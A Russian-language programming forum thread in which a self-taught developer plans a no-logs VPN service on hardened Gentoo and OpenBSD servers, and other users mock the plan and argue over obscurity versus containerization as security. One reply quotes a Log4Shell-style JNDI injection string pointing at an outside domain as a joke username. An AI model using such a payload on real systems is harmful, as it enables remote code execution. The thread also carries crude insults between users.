Программирование[11]

Rooster написал 23 минуты назад:

Президент Nill Kiger написал 42 минуты назад:

madvlaydin написал 8 часов назад:

сколько деняк получаешь? можно в джаст дуитах по старому курсу (1дд = 100к рублей), можно в голроботах по старому курсу (1грб = 60к деревянных)

нолик получаю. Ни разу в компаниях не работал, да и не нужен я им особо. Сидит хаэр, ищет синиора, мою заявку смотрит -  работал НИГДЕ и гитхаб пустой.
Там до технического собеседования и не дойдёт. К которому готовиться минимум месяц. Мне что щас с серьезным ебалом сидеть алгоритмы вспоминать и задачки решать ?

К тому же я гитом пользуюсь плохо. В мастер ветке всё делаю и мне комфортно. Никакие методологии разработки не известны.
Временами бывает желание поработать где нибудь, потому что офисная атмосфера минимизирует прокрастинацию, я бы там отчасти и своими идеями занимался.
Но щас если куда то идти, то это МАКСИМУМ мидлом в среднюю  компанию на 150к,  в которой ваще всем похуй.
Я сам на своих проектах больше имею гораздо, но это нестабильно. Условно с февраля ни рубля не зафармил.

Если работать где то, то для себя вижу например эту вакансию. https://www.valvesoftware.com/en/jobs?job_id=12
Мне было бы интересно там поработать неважно за какие деньги.
Ради этой вакансии условно месяц я бы потратил на подготовку. Но английский разговорный за месяц я точно не осилю.


Или вот слышал, что можно условно быть мейнтейнером в ядро линукс и тебе зарплату редхат платят, просто сидишь дома занимаешься что тебе и так интересно.
А не помогаешь строить другим людям их бизнес за крупицу денег.
 

Щас подумываю впн свой сервис сделать на уровне протонмеил тоже с онион доменам. Впны работать на gentoo/openbsd будут.

 

@hira88 Я нашёл твоего брата

 

 

ровно так же подумал, мейби это фэк его, только нормис? или хира выехал из Крыма и решил перестать заходить с мейна

да английский надо бы!
 

ебаное чувство, когда можешь слушать и смотреть шоу без перевода и субтитров 
А как дело доходит 2 строчки прочитать я плыву.

Впн ваще будите мой покупать ? Никаких логов, высокая скорость.

Ебанутая безопасность серверов на которых будет впн крутиться.
Так как на серверах gentoo весь софт будет билдиться с исходников, со специфичными флагами.
Практически нулевые шансы на любые эсплоиты. Никакого systemd.

wireguard/openvpn на выбор. Так же будет вариант цепочка: на входе gentoo, посередине tor, на выходе openbsd.

Возможность оплатить через monero ну и eth, btc, solana кому похуй.

Плюс поддержите отечественного производителя.


 

Президент Nill Kiger said 2 minutes ago:

Впн ваще будите мой покупать ?

Чтобы ты видел как я смотрю порно с трапами и конями?

Ой

Президент Nill Kiger написал 4 минуты назад:

Ебанутая безопасность серверов на которых будет впн крутиться.
Так как на серверах gentoo весь софт будет билдиться с исходников, со специфичными флагами.
Практически нулевые шансы на любые эсплоиты. Никакого systemd.

Ебанутая безопасность это использование изолированных контейнеров, а не генту.

Потому что ты на своей генту всоло не запилишь сервис нужний большим чем 3.5 человекам 

без использования всякого говна типо ELK (тут вообще может быть любое говно которое тебе необходимо будет для мейнтейна/whatever) суть просто в том, что рано или поздно тебе понадобится какое-то говно написанное на/c java

Ты конечно соберешь это все на своей генту через emerge и с необходимыми флагами, вот только тебе залетит какой-нибудь 0-day log4j и ты поешь говна от юзера с ником ${jndi:ldaps://somedomain.com} и с RMI во всей твоей генту.

П.С. Очередной анальник зашел на форум пофантазировать с мурашками о своих вонаби стартапах в голове поигрывая какахой в заднице. Жаль конечно мотивации дальше git init не будет да и скоро пойдет покакать и мурашки уйдут 

А я хотел суперпупервипиэн

У тебя есть 0-day инфа переполнение буфера в стеке на сишном софте, который у меня сбилжен с набором флагов комплияции и USE флагов, о которых у тебя нет информации. Твой алгоритм действий после этого? Куда пойдешь ? Что будешь делать ?
Тебе чтобы что то делать нужно знать оффсеты. Что ты без бинаря мне сделаешь ? 

Для упрощения твоей задачи стек не защищен от исполнения,  никаких канареек. Хотя в реальности всё это будет.


Только джаву не приплетай, я о ней ничего не знаю и она мне никогда не была нужна, что мне может понадобиться на джаве конкретно ? Во первых, ничего, во вторых если понадобится - напишу на си/расте сам.

Президент Nill Kiger написал 28 минут назад:

Во первых, ничего, во вторых если понадобится - напишу на си/расте сам.

Предлагаю начать сразу с CRMки,  не будешь же ты сам платежи валидировать и доступы выдавать 

Президент Nill Kiger написал 30 минут назад:

который у меня сбилжен с набором флагов комплияции и USE флагов, о которых у тебя нет информации

Если бы у тебя были базовые познания в ИБ ты бы знал, что сокрытие алгоритма не является сколь-либо надежной защитой. 

Index said 58 minutes ago:

 

Если бы у тебя были базовые познания в ИБ ты бы знал, что сокрытие алгоритма не является сколь-либо надежной защитой. 

Если бы мы в одной компании работали в офисе условно. за ТАКИЕ СЛОВА  на первый раз тебе подзатыльников парочку дал, а на следующий в бороду и отдыхать. Собственно еще одна причина почему на работу в офис меня не возьмут. 

Имел бы ты базовые практические навыки в иб а не балабольством в интернете занимался - знал бы что сокрытие алгоритма и использование непопулярных техник это один из лучших способов защиты на практике. А надежная защита, это та, которую сломать непропорционально дороже, полученной выгоды.

Слушай а чё это вот защиту на софт виндовый и игры делают. Код путают ?
Протекторы там всякие виртуальные машины ? https://vmpsoft.com/ themida и тд.
Серверный memory map из продвинутых техник.
Не работают они ваще ? Ты бы им решение подсказал, а то чё они мучаются.

Ядра операционок тоже дураки пишут рандомизации адресов там всякие ну и идиоты.

Или может быть популярным интерет сервисам стоит в опенсорс свой бэкэнд выложить ?
 

это всё очень интересно, конечно
а див по центру выровнять сможете?

еще и кнопку в красный покрасим

вы только обращайтесь

Президент Nill Kiger написал 11 минут назад:

Если бы мы в одной компании работали в офисе условно. за ТАКИЕ СЛОВА  на первый раз тебе подзатыльников парочку дал, а на следующий в бороду и отдыхать. Собственно еще одна причина почему на работу в офис меня не возьмут. 

Какой агрессивный анальник  

Президент Nill Kiger написал 11 минут назад:

Имел бы ты базовые практические навыки в иб а не балабольством в интернете занимался - знал бы что сокрытие алгоритма и использование непопулярных техник это один из лучших способов защиты на практике. А надежная защита, это та, которую сломать непропорционально дороже, полученной выгоды.

Это не защита, это как ты сказал всего лишь затруднение/увеличение времени.

Клиенты например обфусцируют просто чтобы код не спиздили. Или эмуляторы не клепали как горячие пирожки.

Плюс если мы говорим про клиент-серверное взаимодействие то запутывание алгоритма может дать возможность обнаружить какие-то попытки взаимодействия и иметь время среагировать.

Но открытый эксплоит или end-to-end шифрование никто в здравом уме не будет закрывать сокрытием алгоритма.

Index said 22 minutes ago:

Это не защита, это как ты сказал всего лишь затруднение/увеличение времени.

Клиенты например обфусцируют просто чтобы код не спиздили. Или эмуляторы не клепали как горячие пирожки.

Плюс если мы говорим про клиент-серверное взаимодействие то запутывание алгоритма может дать возможность обнаружить какие-то попытки взаимодействия и иметь время среагировать.

Но открытый эксплоит или end-to-end шифрование никто в здравом уме не будет закрывать сокрытием алгоритма.

 

Любая защита это всего лишь затруднение/увеличение времени. Шифрование вот увеличивает твоё время взлома на дохуя милионов лет с текущей скоростью вычислений.

Остальную часть поста слабо понял, вы теоретики очень абстрактно всегда пишите, а на деле вам буфер дырявый дают ничё сделать с ним не можете и с темы уезжаете.

Причем тут клиент серверное взаимодействие и его обфускация ? Если к тому что "открыть все бэкэнды". Это намек, что  если бы исходники гидры были в открытом доступа, то она не прожила бы 7 лет, а не продержалась и месяца. И сокрытие информации - надёжный метод на практике. И дело не в сокрытии эксплоитов, а в том что 0-day найдут раньше тебя.

Изначально о чём речь шла. Gentoo ненадёжно.
А я говорю надёжно. Твоё незнание какие я использую флаги компляции, оптимизации, USE. Какая конфигурация ядра. Использую ли я LTO усложняют взлом сильнее чем ASLR, KARL, рандомизация очереди библиотек. А в сочитании с ними дают еще большую защиту. Пока ты будешшь перебирать все возможные варианты моего конфига 0-day уже пофиксят.

Какие преимущества имеет относительно этого контейнеризация я так и не услышал. И почему она даёт надёжность, а gentoo нет.

Про анальника ты тоже опорофинился, иди учи теорию. "Анальник труслив и агрессию проявляет в витиеватых постах в интернете".
Это как раз наглядно можно заметить в твоих постах, по причине зависти к тому факту, что у меня будет крутой впн сервис и баннер с рекламой на этом сайте, а в 45-50 лет я буду балатироваться в президенты рф.



 

Президент Nill Kiger написал 3 минуты назад:

а в 45-50 лет я буду балатироваться в президенты рф.

крым чей?

Президент Nill Kiger написал 35 минут назад:

Изначально о чём речь шла. Gentoo ненадёжно.

Изначально речь шла, что хранить все яйца в одной корзине ненадежно. 

А на генту заебешься разворачивать кластер кубика. 

И вообще писать свой стартап в отрыве от IaC тоже говно. И мейнтейнить ручками не закладывая масштабируемость в том числе человекоподдерживательную.

как дела обстоят с докером на м1? 

Index said 16 minutes ago:

Президент Nill Kiger said 56 minutes ago:

Изначально о чём речь шла. Gentoo ненадёжно.

Изначально речь шла, что хранить все яйца в одной корзине ненадежно. 

А на генту заебешься разворачивать кластер кубика. 

И вообще писать свой стартап в отрыве от IaC тоже говно. И мейнтейнить ручками не закладывая масштабируемость в том числе человекоподдерживательную.

А я считаю, что масштабируемость человекоподдерживаемость на начальных этапах бесполезны. Тем более если ты ничего отличного от всех остальных сервисов предоставить не можешь и у тебя несравнимый с ними начальный бюджет.
А вот нишевые фишки, предоставление чего то необычного. Конкретно в моём случае морального удовлетворения пользователя, что впн, которым он пользуется крутится на каком нибудь OpenBsd и он вообще то слышал что линус торвальдс разработчиков этой OS назвал мастурбирующими на безопасность обезьянами.

Это как есть условно мышки logitech масс маркет. Нет смысла, не имея сравнимого с ними бюджета вдруг начинать делать такие же пластмассовые мышки, ничем не отличающиеся. Производство будет выходить гораздо дороже, а отличий ты предоставить никаких не сможешь, мышки вообще никто не купит.

Гораздо лучше делать как zaunkoenig. Они делают мышки специализированные для пальцевого хвата, которым очень мало кто пользуется. Никто больше так не делает. И они нашли своих покупателей.
 

Странная ниша. По мне лучше мой трафик смешивается с миллионами хомяков, чем я пойду к какому-то мутному скаммеру работающему за битки с кучей свободного времени снифать мой трафик. 

Не только за битки а в 1 очередь за манэро с анонимным блокчейном + к доверию. Протон тот же только биток принимает.
И смешиваясь с хомяками ты еще и показываешь что впн используешь. А пользуясь моим - нет

JuJeu написал 1 час назад:

как дела обстоят с докером на м1? 

Это ж старый мем. Перф по-моему давно пофиксили

у хиры появился достойный конкурент

я уже не уверен, кто победит в схватке